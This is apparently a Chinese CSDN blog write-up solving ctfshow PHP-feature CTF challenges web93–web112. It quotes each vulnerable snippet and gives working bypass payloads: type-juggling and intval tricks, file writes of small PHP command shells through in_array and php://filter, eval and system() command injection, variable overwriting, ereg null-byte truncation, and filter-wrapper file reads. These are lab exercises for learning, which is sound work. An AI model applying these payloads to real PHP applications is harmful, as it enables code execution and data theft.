ctfshow php特性上

已于 2022-05-31 21:41:24 修改
阅读量856 收藏 4
点赞数 1
分类专栏: php ctfshow 文章标签: php 开发语言
于 2022-05-30 21:20:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/125009673
版权
php 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
ctfshow
8 篇文章 6 订阅
订阅专栏

 

目录

web93

web94

web95

web96

web97

web98

​编辑

web99

web100

web101

web102

web103

web104

web105

web106

web107

web108

web109

web110

web111

web112

web93

$num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }

使用进制计算:?num=010574

web94

$num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag; 
    }

在93的基础上过滤了开头为0的数字 这样的话就不能使用进制转换来进行操作 我们可以使用小数点来进行操作。这样通过intval()函数就可以变为int类型的4476 ?num=4476.0

web95

$num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }

可以通过8进制绕过但是前面必须多加一个字节 ?num=+010574或者?num=%2b010574

web96

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }

在linux下面表示当前目录是 ./ 所以我们的payload: u=./flag.php

web97

md5 数组绕过===

web98

include("flag.php");
$_GET?$_GET=&$_POST:'flag';//只要有输入的get参数就将get方法改变为post方法(修改了get方法的地址)
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__); 
//相当于
include('flag.php');
if($_GET){
$_GET=&$_POST;//只要有输入的get参数就将get方法改变为post方法(修改了get方法的地址)
}else{
"flag";
} 
if($_GET['flag']=='flag'){
$_GET=&$_COOKIE;
}else{
'flag';

php引用传递,类似于c语言里的指针地址,可以参考:php函数的传值与传址(引用)详解

三目运算符可以参考:php三元运算符与if的详解

get传入flag=flag,再post传入HTTP_FLAG=flag

web99

<?php
highlight_file(__FILE__);
$allow = array();//设置为数组
for ($i=36; $i < 0x36d; $i++) {   //0x36d=877
array_push($allow, rand(1,$i));//向数组里面插入随机数
}
f(isset($_GET['n']) && in_array($_GET['n'], $allow)){
//in_array()函数有漏洞 没有设置第三个参数 就可以形成自动转换eg:n=1.php自动转换为1
file_put_contents($_GET['n'], $_POST['content']);
//写入1.php文件 内容是<?php system($_POST[1]);?>
} 
?>

查一下in_array()函数,当第三个参数没有设定时,

我们传入的n是字符串,在php字符串和int比较,字符串会被转换成int,因为是弱类型转换,所以 字符串中数字后面的字符串会被忽略

由于in_array没有设置type,我们可以输入1.php,转换之后也就是1,肯定是in_array的,满足条

 get:?n=1.php post: content=<?= `cat f*`;

之后访问/1.php,查看源码,得到flag

web100

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }

and 的优先级是比等号要低的

$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); 就是把is_numeric($v1)的返回值赋值给$v0,然后和后面的进行逻辑运算,并不会修改$v0的值.

is_numeric() 函数用于检测变量是否为数字或数字字符串。若是则为true,否则为false
$v1为任意数字就好了

然后看看过滤,$v2不能有;但是$v3要有;

eval("$v2('ctfshow')$v3");字符串拼接,然后用eval执行

传入v1=1&v2=var_dump($ctfshow)/*&v3=*/;即可

在flag中有0x2d,直接提交不通过,ascii码值为-,改一下即可。

web101

if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }

相比web100多了一堆过滤。var_dump()和print_r()不能用了

此处用到了反射类ReflectionClass

构造:?v1=1&v2=echo new ReflectionClass&v3=;

0x2d转化为-号后flag报错。。。flag一般形式为uuid模式,36位,而我们得到的flag为35位

试了半天最终得出是9.

得到flag:613b65b1-98aa-4109-92da-b530daaac919

web102

$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}

call_user_func()函数把第一个参数作为回调函数调用

 file_put_contents() 函数把一个字符串写入文件中。

hex2bin()函数把十六进制值转换为 ASCII 字符

根据源码可知:v2要纯数字,v3不限。同时v2的前两个数字会被删去

真正可以执行操作的应该是v2 ,它应该达到<?=`cat *`;  的作用

要进行编码转化:

base64转化再转化成16进制

PD89YGNhdCAqYDs=5044383959474e6864434171594473   (这里会把e当作科学计数法)

Get: ?v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

Post: v1=hex2bin

 之后访问1.php查看源码得到flag。

这里也是第一次遇见filter协议来写文件 filter/write=

也学到了 hex2bin()函数:把十六进制值转换为 ASCII 字符

web103

这道题同web102相比,$str过滤了php

if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);

而我们上次的命令hex2bin()解码之后为 <?= `cat f*`;  不是p h p。因此和上一道题做法一样。

http://c507665c-816d-441f-9e0b-48987fc29c77.challenge.ctf.show/?v2=115044383959474e686443417159447367&v3=php://filter/write=convert.base64-decode/resource=1.php

注意: <?=`cat *`; 分号后面有一个空格,不然base64编码后再hex编码不会变成数字e数字。无法满足isnumeric

web104

#payload
aaK1STfY
0e76658526655756207688271159624026011393
aaO8zKZF
0e89257456677279068558073954252716165668

web105

$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

变量覆盖 GET: ?suces=flag POST: error=suces 得到flag。

web106

 数组绕过。

web107

parse_str(string,array) 函数把查询字符串解析到变量中。

注释:如果未设置 array 参数,则由该函数设置的变量将覆盖已存在的同名变量。

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;

?v3=240610708 POST: v1=flag=0

web108

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');

}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){  //877
    echo $flag;
}

ereg()函数: 用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字 母的字符是大小写敏感的。 ereg函数存在NULL截断漏洞,导致了正则过滤被绕过,所以可以使用%00截断正则匹配.

构造:?c=a%00778

web109

$v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }

运用异常处理类来进行命令执行:PHP异常处理(Exception)

ls 发现了fl36dg.txt  cat即可

?v1=Exception&v2=system('cat fl36dg.txt')

?v1=Reflectionclass&v2=system('cat fl36dg.txt')

web110

使用php原生类 FilesystemIterator类来读取文件

getcwd()函数 获取当前工作目录

?v1=FilesystemIterator&v2=getcwd

得到当前路径下的文件为fl36dga.txt  在url后加/fl36dga.txt访问得到flag。

web111

function getFlag(&$v1,&$v2){
    eval("$$v1 = &$$v2;");
    var_dump($$v1);
}


if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
            die("error v2");
    }
    
    if(preg_match('/ctfshow/', $v1)){
            getFlag($v1,$v2);
    }

?v1=ctfshow&v2=GLOBALS

GLOBALS为全局变量。我们要执行getFlag的话,可以把全局变量的值传给v1来输出。

web112

function filter($file){
    if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

代码过滤了base64,rot13,data,等相关filter协议的常用编码以及data协议。

我们可以尝试下面的几个情况来绕过:

php://filter/resource=flag.php
php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php
php://filter/read=convert.quoted-printable-encode/resource=flag.php
compress.zlib://flag.php

葫芦娃42
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP特性(网友根据ctfshow整理)1
08-03
PHP编程语言中,存在一些特定的特性,这些特性可能会对程序的行为产生重大影响,特别是在安全性和逻辑判断方面。以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在...
BUUCTF web(六)
m0_46616663的博客
11-25 2812
[BJDCTF2020]ZJCTF,不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
BUUCTF(web刷题记录一)
nareku的博客
04-16 8689
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
2024年最全ctfshow-WEB-web11( 利用session绕过登录验证)_ctfshow web11(1),【大牛系列教学】
最新发布
2401_84281712的博客
05-11 932
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
无字母命令执行
WHQ556677的博客
12-30 1166
先看一道题 <?php error_reporting(0); show_source(__FILE__); if (isset($_GET['a'])) { $c=$_GET['a']; if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) { system($c); }else { echo "hacker!"; } } ?> 代码审计 过滤了字母
PHP foreach循环
不积跬步 无以至千里 不积小流 无以成江海
10-16 135
foreach()有两种用法: 1: foreach(array_name as $value)    {           statement;        } 这里的array_name是你要遍历的数组名,每次循环中,array_name数组的当前元素的被赋给$value,并且数组内部的下标向下移一步,也就是下次循环回得到下一个元素。 2:f...
<?php show_source(__FILE__); $mess=$_POST['mess']; if(preg_match("/[a-zA-Z]/",$mess)){     die("inva...
weixin_35752122的博客
01-02 250
这是一段PHP代码。它首先使用了函数 show_source 显示当前文件的源代码,然后从POST变量中获取名为mess的并将其赋给变量 $mess。接下来,使用preg_match函数检测 $mess 中是否包含英文字母,如果包含就输出 "invalid input!" 并终止程序。最后,使用 eval 函数对 $mess 进行代码求。 ...
CTFshow-菜狗杯-WEB-变量循环取-我的眼里只有$
03-04
PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件的文件名称列表】"CTFshow-变量循环取-我的眼里只有$" 提供了一个可能包含源代码...
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
[极客大挑战 2019]RCE ME
m0_62905261的博客
07-27 433
[极客大挑战 2019]RCE ME
php常用绕正则姿势
zhwho的博客
07-14 897
异或绕过 接上篇正则表达式,如果出现这样的正则: if (!preg_match('/[a-z 0-9]/is',$_GET['a'])) { eval($_GET['a']); } else{ echo "hacker"; } 即get传参的a变量中不能有数字和字母,但如果想拿到shell就要传入类似eval($_POST[‘shell’])的语句,但这时字母被禁,只能通过其他方式来构造类似的语句,这里就可以用异或规则来绕过。 先介绍下什么是异或,举个例子: 字符:? ASCII
nssctf刷题
weixin_63231007的博客
04-30 1071
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
ctf php正则截断,记[BJDCTF2020]ZJCTF,不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 531
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
preg_match函数绕过
weixin_42478365的博客
10-10 7411
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 1.绕过数字和字母 首先,我们常见的CTF题代码如下,主要是绕过数字和字
ctfshow 命令执行 刷题记录
qq_63548648的博客
12-16 866
1
CTF中Web题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
BUU刷题Day6
姜小孩的博客
03-24 1592
目录 [BJDCTF2020]ZJCTF,不过如此 总结: [网鼎杯 2020 朱雀组]phpweb 总结: [强网杯 2019]高明的黑客 总结: [BJDCTF2020]ZJCTF,不过如此 上来看到源码 <?php ​ error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值